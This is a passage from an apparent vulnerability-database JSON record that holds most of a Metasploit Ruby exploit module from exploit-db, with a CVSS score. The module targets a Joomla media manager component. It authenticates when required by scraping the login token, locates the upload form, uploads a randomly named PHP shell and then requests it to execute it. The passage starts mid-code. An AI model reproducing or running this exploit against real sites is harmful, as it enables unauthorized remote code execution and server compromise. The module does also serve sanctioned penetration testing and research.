'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'view' => 'login'\r\n }\r\n })\r\n\r\n return res\r\n\r\n end\r\n\r\n def login\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"index.php\", \"component\", \"users\", \"/\"),\r\n 'cookie' => @cookies,\r\n 'vars_get' => {\r\n 'task' => 'user.login'\r\n },\r\n 'vars_post' => {\r\n 'username' => @username,\r\n 'password' => @password\r\n }.merge(@login_options)\r\n })\r\n\r\n return res\r\n end\r\n\r\n def parse_login_options(html)\r\n html.scan(/<input type=\"hidden\" name=\"(.*)\" value=\"(.*)\" \\/>/) {|option|\r\n @login_options[option[0]] = option[1] if option[1] == \"1\" # Searching for the Token Parameter, which always has value \"1\"\r\n }\r\n end\r\n\r\n def exploit\r\n @login_options = {}\r\n @cookies = \"\"\r\n @upload_name = \"#{rand_text_alpha(rand(5) + 3)}.php\"\r\n @username = datastore['USERNAME']\r\n @password = datastore['PASSWORD']\r\n\r\n print_status(\"#{peer} - Checking Access to Media Component...\")\r\n res = get_upload_form\r\n\r\n if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/\r\n print_status(\"#{peer} - Authentication required... Proceeding...\")\r\n\r\n if @username.empty? or @password.empty?\r\n fail_with(Exploit::Failure::BadConfig, \"#{peer} - Authentication is required to access the Media Manager Component, please provide credentials\")\r\n end\r\n @cookies = res.get_cookies.sub(/;$/, \"\")\r\n\r\n print_status(\"#{peer} - Accessing the Login Form...\")\r\n res = get_login_form\r\n if res.nil? or res.code != 200 or res.body !~ /login/\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Unable to Access the Login Form\")\r\n end\r\n parse_login_options(res.body)\r\n\r\n res = login\r\n if not res or res.code != 303\r\n fail_with(Exploit::Failure::NoAccess, \"#{peer} - Unable to Authenticate\")\r\n end\r\n elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n print_status(\"#{peer} - Authentication isn't required.... Proceeding...\")\r\n @cookies = res.get_cookies.sub(/;$/, \"\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Failed to Access the Media Manager Component\")\r\n end\r\n\r\n print_status(\"#{peer} - Accessing the Upload Form...\")\r\n res = get_upload_form\r\n\r\n if res and res.code == 200 and res.body =~ /<form action=\"(.*)\" id=\"uploadForm\"/\r\n upload_uri = Rex::Text.html_decode($1)\r\n else\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Unable to Access the Upload Form\")\r\n end\r\n\r\n print_status(\"#{peer} - Uploading shell...\")\r\n\r\n res = upload(upload_uri)\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::Unknown, \"#{peer} - Upload failed\")\r\n end\r\n\r\n register_files_for_cleanup(\"#{@upload_name}.\")\r\n print_status(\"#{peer} - Executing shell...\")\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, \"images\", @upload_name),\r\n })\r\n\r\n end\r\n\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27610/"}]}
